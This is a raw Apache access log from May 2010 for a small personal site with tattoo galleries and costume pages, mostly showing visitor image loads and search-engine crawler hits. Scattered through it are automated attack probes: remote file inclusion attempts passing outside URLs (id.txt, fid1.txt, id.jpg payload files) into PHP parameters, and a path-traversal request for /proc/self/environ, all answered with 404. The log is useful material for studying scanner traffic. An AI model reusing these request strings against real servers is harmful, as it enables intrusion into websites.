188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:24 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:48 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:49 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:49 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:49 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:49 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:21:07 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:21:07 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:21:07 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:21:07 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
67.218.116.163 - - [06/May/2010:13:21:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:13:27:54 -0500] "GET /artwork/dressers.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.40 - - [06/May/2010:13:29:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.38.34.19 - - [06/May/2010:13:35:27 -0500] "GET /logs//skin/ggerzer_diary2_light/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:13:35:27 -0500] "GET //skin/ggerzer_diary2_light/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:13:35:27 -0500] "GET /logs/access_log.1263859200//skin/ggerzer_diary2_light/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:13:36:42 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
205.234.252.102 - - [06/May/2010:13:38:59 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/id.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
205.234.252.102 - - [06/May/2010:13:38:59 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/id.txt%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
207.46.13.43 - - [06/May/2010:13:39:51 -0500] "GET /logs/access_log.1243296000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.14.244.183 - - [06/May/2010:13:40:41 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=it&start=19&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%26um%3D1%26hl%3Dit%26sa%3DN%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
87.14.244.183 - - [06/May/2010:13:40:41 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
87.14.244.183 - - [06/May/2010:13:40:43 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://www.google.it/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=it&start=19&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%26um%3D1%26hl%3Dit%26sa%3DN%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
87.14.244.183 - - [06/May/2010:13:40:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
207.46.13.87 - - [06/May/2010:13:41:52 -0500] "GET /logs/access_log.1207440000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.41 - - [06/May/2010:13:44:38 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:13:46:35 -0500] "GET /logs/access_log.1271030400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [06/May/2010:13:49:09 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.11 - - [06/May/2010:13:49:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.13.242.67 - - [06/May/2010:13:53:20 -0500] "POST /logs//help.php HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NetCaptor 7.0.2 Final; .NET CLR 1.0.3705)"
87.250.255.243 - - [06/May/2010:13:54:15 -0500] "GET /logs/access_log.1271808000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [06/May/2010:13:59:19 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
80.229.27.18 - - [06/May/2010:14:01:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.webring.com/hub?ring=tattoos_s3""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:04 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:13 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
80.229.27.18 - - [06/May/2010:14:01:14 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FBSMTWB; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
87.250.255.243 - - [06/May/2010:14:05:42 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
69.90.47.83 - - [06/May/2010:14:12:37 -0500] "GET /logs/access_log.1237852800////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.90.47.83 - - [06/May/2010:14:12:37 -0500] "GET ////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.90.47.83 - - [06/May/2010:14:12:37 -0500] "GET /logs////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
69.90.47.83 - - [06/May/2010:14:12:42 -0500] "GET /logs/access_log.1219795200////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
80.164.212.178 - - [06/May/2010:14:14:02 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.dk/search?hl=da&rlz=1T4GGLR_daDK297DK300&ei=EBPjS-nwIYGOOKTovd4N&sa=X&oi=spell&resnum=0&ct=result&cd=1&ved=0CBUQBSgA&q=king+and+queens+seats+xv+1100&spell=1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.164.212.178 - - [06/May/2010:14:14:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.62.121.162 - - [06/May/2010:14:15:37 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:37 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:37 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:37 -0500] "GET /logs/access_log.1263600000//language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:38 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:38 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:38 -0500] "GET /logs/access_log.1263600000//language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.62.121.162 - - [06/May/2010:14:15:38 -0500] "GET /logs/access_log.1265241600//language/lang_english/lang_activity.php?phpbb_root_path=http://www.hawlnews.com//fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:14:15:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [06/May/2010:14:18:45 -0500] "GET /logs/access_log.1203206400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.99 - - [06/May/2010:14:20:53 -0500] "GET /logs/access_log.1161043200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:14:21:17 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
221.139.49.90 - - [06/May/2010:14:22:51 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
221.139.49.90 - - [06/May/2010:14:22:51 -0500] "GET /logs/access_log.1265241600//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
221.139.49.90 - - [06/May/2010:14:22:51 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:14:23:03 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:14:23:03 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [06/May/2010:14:23:03 -0500] "GET /logs/access_log.1265241600//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.140 - - [06/May/2010:14:25:22 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:14:31:32 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.73.239.8 - - [06/May/2010:14:38:01 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [06/May/2010:14:38:01 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
83.217.224.50 - - [06/May/2010:14:43:54 -0500] "GET /logs/access_log.1231718400///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
83.217.224.50 - - [06/May/2010:14:43:54 -0500] "GET ///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
83.217.224.50 - - [06/May/2010:14:43:55 -0500] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
87.250.255.243 - - [06/May/2010:14:44:20 -0500] "GET /logs/access_log.1228348800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.195 - - [06/May/2010:14:46:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:14:50:45 -0500] "GET /logs/access_log.1266883200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.217.224.50 - - [06/May/2010:14:50:49 -0500] "GET /logs/access_log.1237852800///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
87.250.255.243 - - [06/May/2010:15:02:18 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.71.1.68 - - [06/May/2010:15:03:38 -0500] "GET /logs//noticias.php?arq=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
80.71.1.68 - - [06/May/2010:15:03:38 -0500] "GET //noticias.php?arq=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:07:57 -0500] "GET /logs//index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:07:58 -0500] "GET //index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:08:30 -0500] "GET //index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:08:45 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:08:46 -0500] "GET //index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:08:46 -0500] "GET /logs//index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [06/May/2010:15:13:15 -0500] "GET /logs/access_log.1190332800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [06/May/2010:15:13:51 -0500] "GET /logs/access_log.1251417600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
